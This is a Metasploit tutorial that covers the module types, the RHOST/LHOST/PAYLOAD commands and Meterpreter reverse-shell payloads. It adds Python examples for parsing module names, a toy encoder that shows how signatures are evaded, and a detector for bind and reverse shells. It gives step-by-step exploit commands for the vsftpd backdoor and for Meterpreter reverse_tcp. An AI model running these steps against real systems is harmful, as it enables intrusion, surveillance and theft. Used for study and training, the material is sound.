Date: 06 Mar, 2025
What is Metasploit Framework?
- The Metasploit Framework is an open-source penetration testing tool used to find, exploit, and validate vulnerabilities in computer systems, networks, and web applications.
- It's like a Swiss army knife for ethical hackers and cybersecurity professionals.
Burp v/s Metasploitable
| | Burp | Metasploitable |
|---|---|---|
| Focus area | Web app, API, client-server interaction | OS, services, common known vulnerabilities (CVE), OS networks |
| Users | Web app testers / pentesters | Red team / pentesters |
| Good for | Finding XSS, CSRF, SQL injection, logical flaws in web apps | Gaining shell access, privilege escalation |
What Can You Do With Metasploit?
| Use Case | Description |
|---|---|
| Vulnerability Scanning | Check if a system is vulnerable to known exploits |
| Exploit Execution | Launch real exploits on vulnerable machines (e.g., Metasploitable) |
| Payload Delivery | Inject code (like reverse shells, bind shells) into target systems |
| Post-Exploitation | Gather more info, elevate privileges, open backdoors |
| Defensive Testing | Help blue teams test and improve security defenses |
⚙️ Key Components:
- Exploits: Code that takes advantage of a vulnerability.
- Payloads: The actions you want to perform after exploitation (e.g., open a shell, create a user).
- Listeners (Handlers): Wait for a connection back from the payload.
- Modules: Building blocks like exploits, payloads, scanners, etc.
Example Use Flow:
- Launch Metasploit console: msfconsole
- Search for a vulnerability: search vsftpd
- Use an exploit: use exploit/unix/ftp/vsftpd_234_backdoor
- Set target options: set RHOST <IP> and set RPORT <PORT>
- Choose payload: set PAYLOAD cmd/unix/interact
- Exploit it: exploit
What is Metasploitable 2?
Metasploitable 2 is a deliberately vulnerable virtual machine (VM) created by the developers of the Metasploit Framework. It's used primarily for penetration testing, ethical hacking, and cybersecurity training.
msfconsole
msfconsole is the main command-line interface (CLI) for the Metasploit Framework.
Metasploit has 6 types of modules:
1. Exploit Modules
- Contains the actual code that takes advantage of a vulnerability in a system or application.
Example: exploit/windows/smb/ms17_010_eternalblue
Breaking the module path down:
- Module Type: exploit → This is an exploit module, meaning it tries to take advantage of a vulnerability.
- Target Platform: windows → The target operating system is Windows.
- Service or Protocol: smb → This exploit targets the SMB (Server Message Block) protocol, used for file and printer sharing on Windows networks.
- Vulnerability ID and Name: ms17_010_eternalblue → MS17-010 is the Microsoft security bulletin ID. The vulnerability is popularly known as EternalBlue. This flaw was leaked by the Shadow Brokers and famously used in the WannaCry ransomware attack in 2017.
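The naming scheme above is regular enough to parse, which is handy when you are reading logs or reports that mention module references. The Python helper below is an added example for these notes (it is not Metasploit code) that splits a reference into its type, its second-level group (platform for exploit/post/payload modules, a category such as scanner for auxiliary modules, an architecture for encoder/nop modules), the service directory for exploits, and the name, and pulls an MS bulletin ID out of names like ms17_010_eternalblue. Payload and encoder references appear on this page without a type prefix (as in set PAYLOAD windows/x64/meterpreter/reverse_tcp), so the helper takes a default type for that case. The field names are my own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# The six module types described in these notes.
MODULE_TYPES = ("exploit", "payload", "auxiliary", "post", "encoder", "nop")

# Names such as ms17_010_eternalblue start with a Microsoft bulletin ID.
MS_BULLETIN = re.compile(r"^ms(\d{2})_(\d{3})", re.IGNORECASE)


@dataclass
class ModuleRef:
    type: str                # exploit, payload, auxiliary, post, encoder, nop
    group: Optional[str]     # second path segment: platform / category / architecture
    service: Optional[str]   # protocol directory, only meaningful for exploits (e.g. smb)
    name: str                # last path segment
    bulletin: Optional[str]  # "MS17-010" when the name carries one, else None
    segments: List[str]      # full path without the type prefix


def parse_module(ref: str, default_type: str = "payload") -> ModuleRef:
    """Split a Metasploit module reference into its components.

    References like 'windows/x64/meterpreter/reverse_tcp' are written
    without a type prefix in 'set PAYLOAD' lines, so default_type is used
    when the first segment is not one of MODULE_TYPES.
    """
    segments = [s for s in ref.strip().split("/") if s]
    if not segments:
        raise ValueError("empty module reference")

    if segments[0] in MODULE_TYPES:
        mtype = segments[0]
        segments = segments[1:]
    else:
        if default_type not in MODULE_TYPES:
            raise ValueError(f"unknown module type: {default_type}")
        mtype = default_type
    if not segments:
        raise ValueError("module reference has no name")

    name = segments[-1]
    group = segments[0] if len(segments) > 1 else None
    service = segments[1] if mtype == "exploit" and len(segments) > 2 else None
    match = MS_BULLETIN.match(name)
    bulletin = f"MS{match.group(1)}-{match.group(2)}" if match else None
    return ModuleRef(mtype, group, service, name, bulletin, segments)


if __name__ == "__main__":
    # Module references taken from these notes.
    for ref in ("exploit/windows/smb/ms17_010_eternalblue",
                "windows/x64/meterpreter/reverse_tcp",
                "auxiliary/scanner/portscan/tcp",
                "post/windows/gather/enum_logged_on_users",
                "nop/x86/opty2"):
        print(parse_module(ref))
    print(parse_module("x86/shikata_ga_nai", default_type="encoder"))
```

Run it directly to see each reference from this page broken into its parts; the bulletin field is only filled for names that start with an MS bulletin ID.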
What does this exploit do?
- It exploits a critical vulnerability in the SMBv1 protocol on certain Windows systems.
- If successful, it can give the attacker remote code execution — meaning full control over the target system without needing login credentials.
2. Payload Modules
These are the actions you want to perform on the target once it is exploited.
Purpose:
To deliver malicious code or commands to the compromised system — this could be to open a shell, create a user, or install a backdoor.
Types of Payloads:
- Reverse Shell: Target connects back to the attacker.
- Bind Shell: Attacker connects to a port opened on the target.
- Meterpreter: Advanced payload that gives interactive control over the system.
Example: windows/x64/meterpreter/reverse_tcp
This opens a reverse Meterpreter shell on a 64-bit Windows machine.
3. Auxiliary Modules
These are non-exploit modules used for tasks like scanning, sniffing, fuzzing, DoS, etc.
Purpose:
To gather information or perform supportive functions during a penetration test.
Example: auxiliary/scanner/portscan/tcp
Performs a TCP port scan on the target to identify open services.
Use Cases:
- Service version scanning
- Login brute-forcing
- Network sniffing
- Vulnerability checking
4. Post Modules
These are used after a successful exploitation to interact further with the target — think of it as the “next stage”.
Purpose:
To perform post-exploitation tasks like extracting passwords, escalating privileges, or gathering system info.
Example: post/windows/gather/enum_logged_on_users
Lists users currently logged into the system.
Use Cases:
- Dumping credentials
- Capturing keystrokes
- Installing persistence
- Mapping the internal network
5. Encoder Modules
Used to encode payloads so that they are less detectable by antivirus or intrusion detection systems (IDS).
Purpose:
To obfuscate the payload by encoding it, making it harder for security tools to identify the attack.
Example: x86/shikata_ga_nai
A popular polymorphic encoder that creates a new version of the payload every time.
Encoders don’t encrypt the payload — they just transform it in a way to evade signature-based detection.
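To see why an encoder defeats a raw-byte signature while changing nothing about what eventually runs, here is a small Python illustration added to these notes. It is not Metasploit code: the encoder is a deliberately trivial single-byte XOR standing in for shikata_ga_nai, the "payload" is a constructed marker string, and the signature is a substring of it. The two checks show the defender's side of the point: matching bytes as they appear on disk or on the wire misses every encoded variant, and every key produces a different file hash, while the same signature applied after decoding (or to the decoded content in memory) still matches.

```python
import hashlib
from typing import Iterable, Set

# Constructed stand-in for a payload, and a byte signature derived from it.
SAMPLE_PAYLOAD = b"CONSTRUCTED-SAMPLE-PAYLOAD-NOT-REAL-CODE"
SIGNATURE = b"SAMPLE-PAYLOAD"


def xor_encode(data: bytes, key: int) -> bytes:
    """Toy encoder: XOR every byte with one key byte. Applying it again decodes."""
    if not 0 <= key <= 0xFF:
        raise ValueError("key must be a single byte")
    return bytes(b ^ key for b in data)


def signature_hit(blob: bytes, signature: bytes = SIGNATURE) -> bool:
    """Signature check on bytes exactly as seen (on disk or on the wire)."""
    return signature in blob


def signature_hit_after_decode(blob: bytes, key: int,
                               signature: bytes = SIGNATURE) -> bool:
    """Same signature, applied once the content has been decoded."""
    return signature_hit(xor_encode(blob, key), signature)


def variant_hashes(data: bytes, keys: Iterable[int]) -> Set[str]:
    """SHA-256 of each encoded variant: every key yields a different artefact,
    which is why hash-based blocklists do not keep up with polymorphic output."""
    return {hashlib.sha256(xor_encode(data, k)).hexdigest() for k in keys}


if __name__ == "__main__":
    encoded = xor_encode(SAMPLE_PAYLOAD, 0x5A)
    print("raw bytes match signature:      ", signature_hit(SAMPLE_PAYLOAD))
    print("encoded bytes match signature:  ", signature_hit(encoded))
    print("match after decoding:           ", signature_hit_after_decode(encoded, 0x5A))
    print("distinct hashes for 5 keys:     ", len(variant_hashes(SAMPLE_PAYLOAD, range(1, 6))))
```

The practical takeaway for blue teams is that controls which only look at static bytes (file hashes, on-disk string signatures) are the ones an encoder is built to slip past; detection that runs after the content is decoded, or that watches behaviour, is unaffected by the transformation.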
6. NOP Modules (No Operation)
NOP stands for "No Operation" — these are padding instructions used in exploits.
Purpose:
To align payloads in memory or bypass certain security mechanisms by "filling space" with harmless instructions.
Example: nop/x86/opty2
Use Cases:
- Used in buffer overflow attacks
- Helps ensure the payload lands correctly in memory
- Rarely used directly by the attacker, but important in exploit development
Summary Table:
| Module Type | Purpose | Common Use |
|---|---|---|
| Exploit | Take advantage of a system flaw | Gain unauthorized access |
| Payload | Action after access is gained | Shells, backdoors, etc. |
| Auxiliary | Scanning, sniffing, DoS | Info gathering |
| Post | Tasks after exploitation | Privilege escalation, data theft |
| Encoder | Hide payloads from antivirus | Obfuscation |
| NOP | Help in memory alignment | Buffer overflow support |
These are the core Metasploit commands used while setting up an exploit. Let's break them down:
set RHOST
- RHOST stands for Remote Host.
- This is the IP address of the target machine (the victim).
- You're telling Metasploit, “This is the machine I want to attack.”
set RHOST 192.168.1.10
set LHOST
- LHOST stands for Local Host.
- This is the IP address of your attacker machine (usually your Kali Linux machine).
- It tells the target where to send the reverse connection back to once it’s compromised.
set LHOST 192.168.1.5
set PAYLOAD
- A payload is the actual malicious code that will run on the target after the exploit succeeds.
- You can choose different payloads depending on what you want:
  - Reverse shell (target connects back to you)
  - Bind shell (you connect to the target)
  - Meterpreter session (a powerful post-exploitation shell)
Example: set PAYLOAD windows/x64/meterpreter/reverse_tcp
Quick Summary:
| Command | Meaning | You Set It To |
|---|---|---|
| RHOST | Remote target IP | Victim machine |
| LHOST | Local attacker IP | Your machine |
| PAYLOAD | What runs on the target after exploit | Shell, Meterpreter, etc. |
Meterpreter
- Short for Meta-Interpreter.
- A post-exploitation tool that gives you an interactive shell on the target system after a successful exploit.
- It's not a traditional shell (like Bash or CMD) — it's a powerful payload that runs in memory and gives you a stealthy, feature-rich command environment on the victim's machine.
How Meterpreter Works:
- Delivered as a payload after exploitation (e.g., windows/meterpreter/reverse_tcp)
- Lives in memory only (no files written to disk — helps avoid AV detection)
- Communicates with your attacker machine over reverse TCP, HTTP, or HTTPS
Key Features of Meterpreter:
| Feature | Description |
|---|---|
| In-memory execution | Doesn’t touch disk, hard to detect |
| Command shell | Control the target system interactively |
| Screenshots | Take screenshots of the user’s desktop |
| Microphone recording | Capture audio from the victim’s mic |
| File upload/download | Move files between systems |
| Webcam snapshot | Take pictures using webcam |
| User session management | View or kill active user sessions |
| Privilege escalation | Try to get SYSTEM/root access |
| Keylogger | Record keystrokes in real-time |
| Network pivoting | Use the target as a proxy to reach internal networks |
Types of Meterpreter Payloads:
| Payload | Description |
|---|---|
| windows/meterpreter/reverse_tcp | Target connects back to attacker (most common) |
| windows/meterpreter/bind_tcp | Attacker connects to a port on the target |
| windows/meterpreter/reverse_http | Reverse shell over HTTP |
| windows/meterpreter/reverse_https | Reverse shell over encrypted HTTPS |
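The reverse/bind distinction in this table (and in the Types of Payloads list earlier) maps directly onto two things a defender can baseline: which ports each host is expected to listen on, and which destinations it is expected to connect out to. A bind payload shows up as a listener that was not there before; a reverse payload shows up as an outbound connection to a peer the host has no business talking to. The Python below is an added example for these notes (not Metasploit code) that runs those two checks over a constructed set of connection events; the hosts, addresses and baseline are all invented. Because reverse_http and reverse_https ride on ports 80 and 443, the egress check is keyed on the destination address rather than the port, so the 443 connection in the sample is still flagged.

```python
import csv
import io
from typing import Dict, List, Set

# Constructed sample events (not real telemetry). A listening socket has no
# remote side; an outbound connection records the peer the host connected to.
SAMPLE_EVENTS = """\
host,direction,local_port,remote_ip,remote_port
ws01,listen,135,,
ws01,listen,445,,
ws01,listen,4444,,
ws01,outbound,51001,10.0.0.10,443
ws01,outbound,51002,198.51.100.7,443
ws01,outbound,51003,198.51.100.7,4444
srv02,listen,3389,,
srv02,outbound,52010,10.0.0.10,80
"""

# Constructed baseline: per host, the expected listeners and approved egress peers.
BASELINE: Dict[str, Dict[str, Set]] = {
    "ws01": {"listen_ports": {135, 139, 445}, "egress_allow": {"10.0.0.10"}},
    "srv02": {"listen_ports": {3389}, "egress_allow": {"10.0.0.10"}},
}


def parse_events(text: str) -> List[dict]:
    """Turn the CSV text into typed event records."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        events.append({
            "host": row["host"],
            "direction": row["direction"],
            "local_port": int(row["local_port"]),
            "remote_ip": row["remote_ip"] or None,
            "remote_port": int(row["remote_port"]) if row["remote_port"] else None,
        })
    return events


def check_events(events: List[dict], baseline: Dict[str, Dict[str, Set]]) -> List[dict]:
    """Flag unexpected listeners (bind-shell pattern) and unexpected egress
    peers (reverse-shell pattern) relative to each host's baseline."""
    alerts = []
    for ev in events:
        profile = baseline.get(ev["host"])
        if profile is None:
            alerts.append({"host": ev["host"], "kind": "unknown_host",
                           "detail": "no baseline for host"})
            continue
        if ev["direction"] == "listen" and ev["local_port"] not in profile["listen_ports"]:
            alerts.append({"host": ev["host"], "kind": "unexpected_listener",
                           "detail": f"port {ev['local_port']}"})
        elif ev["direction"] == "outbound" and ev["remote_ip"] not in profile["egress_allow"]:
            alerts.append({"host": ev["host"], "kind": "unexpected_egress",
                           "detail": f"{ev['remote_ip']}:{ev['remote_port']}"})
    return alerts


if __name__ == "__main__":
    for alert in check_events(parse_events(SAMPLE_EVENTS), BASELINE):
        print(f"{alert['host']:6} {alert['kind']:20} {alert['detail']}")
```

On the sample data this reports one unexpected listener on ws01 (port 4444) and two unexpected egress connections from ws01 to 198.51.100.7, one of them on 443. The baseline is the hard part in practice: it has to be built from a known-good period per host role, and the allowlists have to be kept current, or the alerts become noise.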